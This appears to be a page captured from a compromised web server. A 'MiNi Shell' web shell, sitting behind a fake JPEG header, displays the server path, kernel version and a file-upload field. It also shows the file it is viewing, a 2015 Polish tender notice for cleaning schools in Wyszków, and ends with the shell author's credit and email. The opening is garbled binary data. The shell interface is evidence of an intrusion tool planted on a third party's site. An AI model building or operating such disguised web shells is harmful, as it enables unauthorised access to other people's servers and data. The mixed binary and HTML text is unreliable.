JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151208/180999-N-2015.html

<p class="kh_header"><b>Wyszków: Utrzymanie czystości w szkołach na terenie Gminy Wyszków</b><br>
<b>Numer ogłoszenia: 180999 - 2015; data zamieszczenia: 08.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Obsługi Placówek Oświatowych w Wyszkowie , ul. 1 Maja 23a, 07-202 Wyszków, woj. mazowieckie, tel. 29 7425830, faks 29 7423595.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zopo-wyszkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie czystości w szkołach na terenie Gminy Wyszków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Utrzymanie czystości w pomieszczeniach 7 Szkół z terenu Gminy Wyszków.

Ogólna powierzchnia do sprzątania wszystkich placówek:  19.016,33 m 2


Ośrodek Nr 1 - Szkoła Podstawowa Nr 1 im. Adama Mickiewicza w Wyszkowie, 
				ul. 11 Listopada 62, 07-200 Wyszków
				Powierzchnia do sprzątania: 2.326,68 m 2

Ośrodek Nr 2 - Szkoła Podstawowa Nr 2 im. Władysława Broniewskiego w Wyszkowie 
				ul. Jana Matejki 5, 07-200 Wyszków
				Powierzchnia do sprzątania: 2.339,20 m 2

Ośrodek Nr 3 - Gimnazjum Nr 2 im. Obrońców Westerplatte w Wyszkowie
				ul. Gen. J. Sowińskiego 55, 07-200 Wyszków
				Powierzchnia do sprzątania: 4.146,69 m 2

Ośrodek Nr 4 - Zespół Szkół  w Wyszkowie Szkoła Podstawowa Nr 5 im Żołnierzy Armii       Krajowej i Gimnazjum Nr 1 im Polskich Mistrzów Olimpijskich
				ul. Geodetów 45, 07-200 Wyszków
				Powierzchnia do sprzątania: 4.335,02 m 2

Ośrodek Nr 5 - Zespół Szkół Rybienko Leśne im. Jana Hempla w Wyszkowie Szkoła Podstawowa Nr 3, Gimnazjum Nr 3; ul. Stefana Batorego 6, 07-200 Wyszków
			Powierzchnia do sprzątania: 3.687,94 m 2

Ośrodek Nr 6 - Zespół Szkół  im. Henryka Sienkiewicza w Rybnie Szkoła Podstawowa, Gimnazjum w Rybnie, ul. Wyszkowska 87, 07-200 Wyszków
			Powierzchnia do sprzątania: 975,80 m 2

Ośrodek Nr 7 - Zespół Szkół im. Jana Pawła II w Leszczydole Nowinach, Szkoła Podstawowa, Gimnazjum, ul. Szkolna 26, 07-200 Wyszków
			Powierzchnia do sprzątania: 1.205,00 m 2

Szczegółowy zakres prac dla poszczególnych placówek oraz wykaz powierzchni do sprzątania znajduje się w załączniku do SIWZ z podziałem na poszczególne placówki. 

Okres i dni sprzątania będą się odbywały zgodnie z obowiązującym kalendarzem roku szkolnego. 
Przygotowanie budynku szkoły w okresach świątecznych feriach zimowych i letnich do rozpoczęcia zajęć wykonując czynności jak w serwisie codziennym Wykonawca ustali indywidualnie z Dyrektorem placówki. 
Harmonogram prac wakacyjnych wykonywanych w miesiącu sierpniu uzgodniony                  i podpisany będzie wraz z Dyrektorem danej placówki i przedstawicielem firmy                    w miesiącu czerwcu. Wynagrodzenie za ten okres powinno być ujęte w ogólnej cenie przedstawionej przez Wykonawcę za okres 10 miesięcy.

Wstępnie proponowane godziny sprzątania w placówkach od 15.30. Faktyczne godziny sprzątania placówek Wykonawca ustali indywidualnie z Dyrektorem danej placówki.
Ogólne założenia sprzątania:

Serwis codzienny: (poniedziałek - piątek), w dniach zajęć dydaktycznych zgodnie                        z kalendarzem roku szkolnego w godzinach popołudniowych indywidualnie do ustalenia              z Dyrektorem danej placówki.
- w dniach zajęć opiekuńczo wychowawczych w godzinach i dniach indywidualnie ustalonych przez Dyrektora Placówki.
- czyszczenie powierzchni podłogowych pomieszczeń - zamiatanie mycie
- wycieranie kurzy z powierzchni, biurek, szaf regałów, stołów uczniowskich, a także parapetów, drzwi, tablic.
- mycie tablic
- odkurzanie wykładzin, dywanów
- mycie lamperii i parapetów w salach, korytarzach, holach
- sprzątanie drabinek i ścian za drabinkami w sali gimnastycznej
- usuwanie zanieczyszczeń stałych z mebli
- porządkowanie i dezynfekcja toalet, w tym kabin: czyszczenie glazury łazienkowej                   na ścianach i podłogach, armatury, luster wiszących, usuwanie kamienia, zabezpieczenie               w papier toaletowy, mydło, środki dezynfekujące i zapachowe w sposób ciągły, na bieżąco
- opróżnianie i czyszczenie koszy na śmieci, wyposażenie ich w worki, wymiana worków            w miarę potrzeb - codzienna SEGREGACJA ŚMIECI
- bieżące utrzymanie porządku i czystości w sanitariatach, klatkach schodowych, korytarzach, holach, salach dydaktycznych, salach gimnastycznych
- wykonywanie doraźnych poleceń Zamawiającego dotyczących utrzymania w czystości budynku.

Sprzątanie okresowe: minimum 1 raz w tygodniu:
- zmywanie podłogi w sali gimnastycznej środkiem przeciwpoślizgowym 
- usuwanie gumy do żucia spod ławek

Sprzątanie okresowe: minimum 2 razy w roku tj. w miesiącu marcu i sierpniu, oraz                  w dniach i godzinach indywidualnie ustalonych przez Dyrektora danej placówki,
- mycie okien,
- pranie firan,
- mycie kaloryferów, rur, osprzętu, lamp i kloszy oświetleniowych
- wysokościowe mycie okien (alpinistyczne) w sali gimnastycznej
- pastowanie i konserwacja podłóg w pomieszczeniach wyposażonych w parkiet środkiem do tego przeznaczonym
- przygotowanie budynku szkoły w okresach świątecznych feriach zimowych i letnich do rozpoczęcia zajęć wykonując czynności jak w serwisie codziennym. 


1.	Przedmiot zamówienia obejmuje również utrzymanie czystości podczas remontów
2.	 Środki techniczne i sprzęt oraz środki czystości do wykonania usługi Wykonawca zabezpiecza we własnym zakresie i na własny koszt.
3.	 Materiały i środki użyte do wykonania usługi winny posiadać atesty. 
4.	Wykonawca jest zobowiązany do zapewnienia odpowiedniej ilości środków, sprzętu i osób  niezbędnych do prawidłowego wykonania zamówienia.
5.	 Wyposażenie w środki zapachowe, worki na śmieci, papier toaletowy i ręczniki papierowe musi mieć charakter stały i ciągły.
6.	 Wykonawca zobowiązany jest w czasie wykonywania usług na terenie objętym umową należyty ład, porządek, przestrzeganie przepisów BHP i p.poż oraz ponosi odpowiedzialność za szkody powstałe w związku z realizacją usług oraz wskutek innych działań osób zatrudnionych przez Wykonawcę. 

We wszystkich placówkach objętych zamówieniem obowiązuje segregacja śmieci. 
1.	Wykonawca zapewni jedna osobę koordynującą pracę swojego personelu, która obejmie stały nadzór nad pracownikami Wykonawcy w celu świadczenia usługi będącej przedmiotem zamówienia z należytą starannością i sprawną organizacją oraz bieżącym kontaktem z Dyrektorem szkoły.
2.	Przynajmniej raz w tygodniu kontrola osoby koordynującej pracę ze strony Wykonawcy wraz z Dyrektorem szkoły bądź osobą delegowaną przez Dyrektora danej placówki. Kontrola winna być potwierdzona protokołem. Protokół aby był ważny każdorazowo musi być podpisany przez Dyrektora placówki lub osobę przez niego delegowaną oraz przez osobę koordynującą  pracę ze strony Wykonawcy. Każdorazowe protokoły wystawione w danym miesiącu będą stanowiły podstawę do wystawienia faktury za daną placówkę i za dany miesiąc.
3.	Wykonawca do realizacji zamówienia stosować będzie własny sprzęt i środki czystości, dezynfekujące, zapachowe, środki higieniczne, worki na śmieci posiadające atesty i urządzenia techniczne posiadające certyfikaty oraz znak bezpieczeństwa, służące do utrzymania porządku wewnątrz budynku. Zamawiający zastrzega sobie możliwość wpływania na dobór środków czystości i środków higienicznych wykorzystywanych do realizacji przedmiotu zamówienia.
4.	Wykonawca ponosi odpowiedzialność za przepisy bhp i p.poż przy świadczeniu usług oraz ponosi odpowiedzialność za szkody powstałe w związku z realizacją usług, a także wskutek innych działań osób zatrudnionych przez Wykonawcę.
5.	Usługa będzie wykonywana na bieżąco w szkołach zgodnie z kalendarzem roku szkolnego w godzinach popołudniowych indywidualnie do ustalenia z Dyrektorem placówki, 
6.	Wykonawca będzie informował Dyrektora Szkoły lub osobę przez niego upoważnioną o wszelkich widocznych nieprawidłowościach w stanie poszczególnych pomieszczeń, urządzeń i umeblowania budynku.
7.	Wykonawca zobowiązany będzie do zachowania w tajemnicy wszelkich informacji uzyskanych w związku z wykonywaniem ww. usług.
8.	Zleceniobiorca zobowiązany jest do takiej organizacji sprzątania, która uwzględni realizacje funkcji opiekuńczo-wychowawczej, a mianowicie: organizację imprez i uroczystości szkolnych oraz klasowych. (spotkania uczniów po zajęciach lekcyjnych, dyskoteki, zebrania, wywiadówki itp.), Rady Pedagogiczne, szkolenia zajęcia rekreacji ruchowej itp.
9.	Zamawiający umożliwi Wykonawcom dokonanie wizji lokalnej w celu uzyskania wszelkich informacji, które mogą być przydatne do przygotowania oferty..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.90.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium wnoszone przed terminem składania ofert. 
Wadium w wysokości: 12.400,00 zł. (dwanaście tysięcy czterysta złotych.)

Wadium w pieniądzu należy wpłacić przelewem na rachunek bankowy zamawiającego:
Bank Spółdzielczy w Wyszkowie  63 89310003 0002 1773 2029 0003 z dopiskiem: Utrzymanie czystości w szkołach na terenie Gminy Wyszków.
Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego.
1.	Wykonawca, który nie wniesie wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
2.	Dyspozycję w zakresie zwrotu wniesionych w pieniądzu wadiów wykonawców, zamawiający przekaże do banku niezwłocznie po:
a)	Wyborze najkorzystniejszej oferty lub unieważnieniu postępowania z wyjątkiem Wykonawcy, którego oferta została wybrana, jako najkorzystniejsza.
b)	Wadium wykonawcy, którego oferta została wybrana, jako najkorzystniejsza zamawiający zwróci niezwłocznie po zawarciu umowy oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
3.	Zamawiający niezwłocznie dokona zwrotu wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert,
4.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 tejże ustawy, lub pełnomocnictw, chyba ze udowodni, że wynika to z przyczyn nie leżących po jego stronie.
5.	Wadium wykonawcy, którego oferta została wybrana, zostanie zatrzymane wraz                  z odsetkami w przypadku, gdy wykonawca:
a)	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)	zawarcie umowy stanie się niemożliwe z przyczyn leżących po stronie wykonawcy.
6.	Wadium wniesione w pieniądzu, Zamawiający przechowa na rachunku bankowym i zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że zrealizował w okresie ostatnich 3 lat przed upływem składania ofert, (jeśli okres prowadzenia działalności jest krótszy to w tym okresie) co najmniej 1 usługę jak przedmiot zamówienia powyżej 15.000 m2, powierzchni biurowej, z podaniem przedmiotu zamówienia, daty zamówienia, wielkości  w m 2 oraz załączy dokumenty, że usługi te zostały wykonane należycie.

Ocena spełniania wyżej wymienionych warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 6 SIWZ. Z treści załączonych dokumentów musi wynikać jedno-znacznie, iż w/w warunki Wykonawca spełnił. 
Niespełnienie chociażby jednego z wymienionych wyżej warunków skutkować będzie  wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań. 
Oświadczenie Wykonawcy o spełnianiu warunków.
Ocena spełniania wyżej wymienionych warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 6 SIWZ. Z treści załączonych dokumentów musi wynikać jedno-znacznie, iż w/w warunki Wykonawca spełnił. 
Niespełnienie chociażby jednego z wymienionych wyżej warunków skutkować będzie  wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie szczególnych wymagań. 
Oświadczenie Wykonawcy o spełnianiu warunków
Ocena spełniania wyżej wymienionych warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 6 SIWZ. Z treści załączonych dokumentów musi wynikać jedno-znacznie, iż w/w warunki Wykonawca spełnił. 
Niespełnienie chociażby jednego z wymienionych wyżej warunków skutkować będzie  wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę        min. 200.000 zł.
Ocena spełniania wyżej wymienionych warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 6 SIWZ. Z treści załączonych dokumentów musi wynikać jedno-znacznie, iż w/w warunki Wykonawca spełnił. 
Niespełnienie chociażby jednego z wymienionych wyżej warunków skutkować będzie  wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty, Formularz cenowy nr 3</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zopo-wyszkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Obsługi Placówek Oświatowych w Wyszkowie
ul. 1 Maja 23 a 
07 - 202 Wyszków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2015 godzina 09:00, miejsce: Zespół Obsługi Placówek Oświatowych w Wyszkowie
ul. 1 Maja 23 a 
07 - 202 Wyszków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com